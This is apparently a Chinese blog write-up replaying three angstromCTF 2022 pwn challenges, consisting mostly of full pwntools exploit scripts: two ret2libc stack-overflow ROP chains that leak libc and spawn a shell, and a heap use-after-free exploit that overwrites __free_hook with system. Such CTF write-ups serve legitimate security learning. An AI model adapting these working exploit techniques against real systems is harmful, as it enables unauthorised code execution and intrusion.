angstromctf2022复现

五一期间同时打两场比赛,虽说都是面向入门的比赛,但自己水平距离足够打比赛还有一段距离,两场比赛很难兼顾,这好像也搞得学长很不爽。。。不过不得不承认,hgame之后自己pwn的水平基本没有进步。。。。

really obnoxious problem

很基础的栈溢出

exp:

from pwn import *
from LibcSearcher import *

context.log_level = "debug"
# context.terminal = ["alacritty", "-e"]
context.terminal = ["tmux", "splitw", "-h"]

elf = ELF("./really_obnoxious_problem")

printf_plt = elf.plt["printf"]
printf_got = elf.got["printf"]
gets_got   = elf.got["gets"]

pop_rdi_ret = 0x4013f3
ret         = 0x401359

p = remote("challs.actf.co", "31225")
# p = process("./really_obnoxious_problem")

p.sendlineafter(b'Name: ', b'aaa')

payload  = b'a' * 0x40
payload += p64(elf.bss() + 0x800)
payload += p64(pop_rdi_ret)
payload += p64(printf_got)
payload += p64(ret)
payload += p64(printf_plt)
payload += p64(pop_rdi_ret)
payload += p64(gets_got)
payload += p64(ret)
payload += p64(printf_plt)
payload += p64(0x401346)
p.sendlineafter(b'Address: ', payload)

# gdb.attach(p)
printf_addr = u64(p.recv(6).ljust(8, b'\x00'))
gets_addr   = u64(p.recv(6).ljust(8, b'\x00'))
print(hex(printf_addr))
print(hex(gets_addr))
libc        = LibcSearcher("printf", printf_addr)
libc.add_condition("gets", gets_addr)
libc_base   = printf_addr - libc.dump("printf")
system_addr = libc_base   + libc.dump("system")
binsh_addr  = libc_base   + libc.dump("str_bin_sh")

payload  = b'a' * 0x48
payload += p64(pop_rdi_ret)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(system_addr)
p.sendline(payload)

p.interactive()

whereami


也是最基础的栈溢出,说实话感觉两道题没什么区别,exp也基本一样。
exp:

from pwn import *
from LibcSearcher import *

context.log_level = "debug"
# context.terminal = ["alacritty", "-e"]
context.terminal = ["tmux", "splitw", "-h"]

elf = ELF("./whereami")

printf_plt = elf.plt["printf"]
printf_got = elf.got["printf"]
gets_got   = elf.got["gets"]

pop_rdi_ret = 0x401303
ret         = 0x40101a

p = remote("challs.actf.co", "31222")
# p = process("./whereami")

payload  = b'a' * 0x40
payload += p64(elf.bss() + 0x800)
payload += p64(pop_rdi_ret)
payload += p64(printf_got)
payload += p64(ret)
payload += p64(printf_plt)
payload += p64(pop_rdi_ret)
payload += p64(gets_got)
payload += p64(ret)
payload += p64(printf_plt)
payload += p64(0x401266)
p.sendline(payload)

p.recvline()
p.recvline()
# gdb.attach(p)
printf_addr = u64(p.recv(6).ljust(8, b'\x00'))
gets_addr   = u64(p.recv(6).ljust(8, b'\x00'))
print(hex(printf_addr))
print(hex(gets_addr))
libc        = LibcSearcher("printf", printf_addr)
libc.add_condition("gets", gets_addr)
libc_base   = printf_addr - libc.dump("printf")
system_addr = libc_base   + libc.dump("system")
binsh_addr  = libc_base   + libc.dump("str_bin_sh")

payload  = b'a' * 0x48
payload += p64(pop_rdi_ret)
payload += p64(binsh_addr)
payload += p64(ret)
payload += p64(system_addr)
p.sendline(payload)

p.interactive()

Dreams

libc 2.31。漏洞比较简单,就是悬垂指针造成的 UAF 和 double free,UAF 可以修改前 8 个字节。不过只能申请五个 0x1C 大小的 chunk
主要思路是:
首先leak堆地址,并修改next指针指向dreams数组中的,这样就控制了第一个指针。
再将第一个指针指向got表,leak出libc。
再指向free_hook,修改free_hook为system。

from os import system
from pwn import *

context.log_level = "debug"
# context.terminal = ["alacritty", "-e"]
context.terminal = ["tmux", "splitw", "-h"]

elf  = ELF("./dreams")
libc = ELF("./libc.so.6")

free_got = elf.got["free"]

p = process("./dreams")

def sleep(index, date, about):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'dream? ', index)
    p.sendafter(b'(mm/dd/yy))? ', date)
    p.sendafter(b'about? ', about)

def sell(index):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'in? ', index)

sleep(b'0', b'111111', b'abcd')
sleep(b'1', b'111111', b'abcd')
sell(b'0')
sell(b'1')

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'1')
p.recvuntil(b'that ')
heap_addr = u64(p.recv(4).ljust(8, b'\x00'))
print(hex(heap_addr))
p.sendafter(b'New date: ', p32(heap_addr + 0x290))
sleep(b'2', b'/bin/sh\x00', b'aaaa')
sleep(b'3', p32(heap_addr), b'\x00' * 0x10) # dreams[3] -> &dreams[0]
sleep(b'2', b'/bin/sh\x00', b'aaaa')

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'3')
p.sendafter(b'New date: ', p32(heap_addr))

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'0')
p.sendafter(b'New date: ', b'aaaaaaaa')

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'3')
p.sendafter(b'New date: ', p32(free_got))

p.sendlineafter(b'> ', b'3')
p.sendlineafter(b'trouble? ', b'0')
p.recvuntil(b'that ')
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
p.sendafter(b'New date: ', b'a')
print(hex(puts_addr))

libc_base = puts_addr - libc.sym["puts"]
system    = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

p.sendlineafter(b'> ', b'3 ')                # 不知道为什么后面几个选项和index发送不加空格的话程序读取输入会有问题
p.sendlineafter(b'trouble? ', b'3 ')
p.sendafter(b'New date: ', p64(free_hook)[:7])
print(hex(free_hook))

p.sendlineafter(b'> ', b'3 ')
p.sendlineafter(b'trouble? ', b'0 ')
p.sendafter(b'New date: ', p64(system)[:7])
print(hex(system))

sell(b'2')

p.interactive()
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇